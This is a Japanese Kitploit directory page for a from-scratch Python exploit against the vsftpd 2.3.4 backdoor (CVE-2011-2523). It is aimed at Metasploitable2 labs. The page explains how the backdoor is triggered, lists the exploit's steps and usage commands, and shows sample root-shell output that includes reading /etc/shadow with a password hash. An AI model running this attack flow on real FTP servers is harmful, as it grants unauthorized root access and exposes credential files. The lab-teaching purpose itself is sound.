Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2011-2523 — Pythonによるゼロからのエクスプロイト開発。Metasploitなし。フレームワークなし。認可されたラボターゲットに対する実際のCVEの生のソケットレベル実装。 | Kitploit
ツール/GitHubGitHub/rushikesh-a-bhujbal/cve-2011-2523
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発ラボと実践
GitHubrushikesh-a-bhujbal/cve-2011-2523

CVE-2011-2523

Pythonによるゼロからのエクスプロイト開発。Metasploitなし。フレームワークなし。認可されたラボターゲットに対する実際のCVEの生のソケットレベル実装。

リポジトリを見る
41日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2011-2523 — vsftpd 2.3.4 バックドアエクスプロイト

Python Platform Target License


概要

vsftpd(Very Secure FTP Daemon)は、Linux を含む Unix 系プラットフォーム向けの FTP サーバーであり、GNU General Public License の下で配布されています。

2011年7月、vsftpd バージョン 2.3.4(2011年6月30日から7月3日の間にダウンロード可能だったもの)が侵害されていたことが発覚しました。未知の攻撃者が vsftpd の配布サーバーへアクセスし、ユーザーへ出荷される前にソースコードへ直接バックドアを注入しました。

これは vsftpd の設計上のバグではありませんでした。これはサプライチェーン攻撃であり、正規のソフトウェアが悪意を持って改変されたバージョンに置き換えられたのです。


バックドアの仕組み

注入されたバックドアコードは、ログイン時の FTP ユーザー名フィールドを監視します。

ユーザー名に :)(スマイリーフェイス)が含まれている場合、バックドアはターゲットマシン上でポート 6200 にバインドされた root シェルを起動します — 認証は一切不要です。

攻撃フロー:

攻撃者 → ポート 21 (FTP) → :) を含む USER を送信 → バックドアが発動 → ポート 6200 で root シェルが開く

攻撃者 → ポート 6200 → 完全な対話型 root シェル

CWE 分類: CWE-78 — OS コマンドに使用される特殊要素の不適切な中和(OS コマンドインジェクション)


このエクスプロイトが行うこと

このエクスプロイトは、標準ライブラリ(socket)のみを使用して純粋な Python でゼロから書かれています。Metasploit は使いません。エクスプロイトフレームワークも使いません。外部依存関係もありません。

手順:

  1. ターゲットのポート 21 (FTP) に接続
  2. FTP サービスのバナーを読み取る
  3. vsftpd のバージョンを抽出して検証 — 2.3.4 でなければ正常終了
  4. :) を含む悪意ある FTP ユーザー名を送信してバックドアを発動
  5. ポート 6200 への2つ目のソケット接続を開く
  6. 完全な対話型 root シェルに入る

要件

  • Python 3.x
  • 外部ライブラリ不要 — 標準ライブラリのみ
  • ターゲット: Metasploitable2(または vsftpd 2.3.4 が動作する任意のシステム)

使用方法

root@kitploit:~
# Clone the repo
git clone https://github.com/rushikesh-a-bhujbal/CVE-2011-2523.git
cd CVE-2011-2523

# Set your target IP inside main.py
target_ip = "YOUR_METASPLOITABLE2_IP"

# Run
python3 main.py

出力例:

root@kitploit:~

[+] Vulnerable version confirmed. Proceeding...

[+] Backdoor triggered. Opening shell on port 6200...

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008
cat /etc/shadow
root:
1
1/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::

exit

エラー処理

シナリオ動作
ポート 21 が閉じている「Port is closed」と表示し、正常終了
接続タイムアウト「Connection timed out」と表示し、正常終了
無効なホスト名/IP「Invalid target」と表示し、正常終了
vsftpd のバージョンが異なる不一致メッセージを表示し、正常終了
ポート 6200 に到達不可バックドア失敗メッセージを表示し、正常終了

テスト済み環境

  • Metasploitable2(意図的に脆弱な VM)
  • vsftpd 2.3.4
  • Linux metasploitable 2.6.24-16-server

法的免責事項

このエクスプロイトは厳密に教育目的および許可されたセキュリティ研究のみを目的として開発されています。

完全に隔離されたラボ環境において、ローカルの Metasploitable2 仮想マシンに対してのみ構築およびテストされています。

自身が所有していない、またはテストに対する明示的な書面による許可を持たないシステムに対してこれを使用しないでください。不正使用は、コンピュータ詐欺および濫用防止法(CFAA)ならびに世界中の同等の法律の下で違法です。

作者はこのコードの悪用に対して一切の責任を負いません。


参考文献

  • CVE Record: https://www.cve.org/CVERecord?id=CVE-2011-2523
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2011-2523
  • Openwall Disclosure: https://www.openwall.com/lists/oss-security/2011/07/11/5
  • PacketStorm: https://packetstormsecurity.com/files/102745/VSFTPD-2.3.4-Backdoor-Command-Execution.html
  • Metasploitable2: https://sourceforge.net/projects/metasploitable/

作者

Rushikesh Bhujbal
Security Research & Exploit Development
GitHub

ツールをダウンロード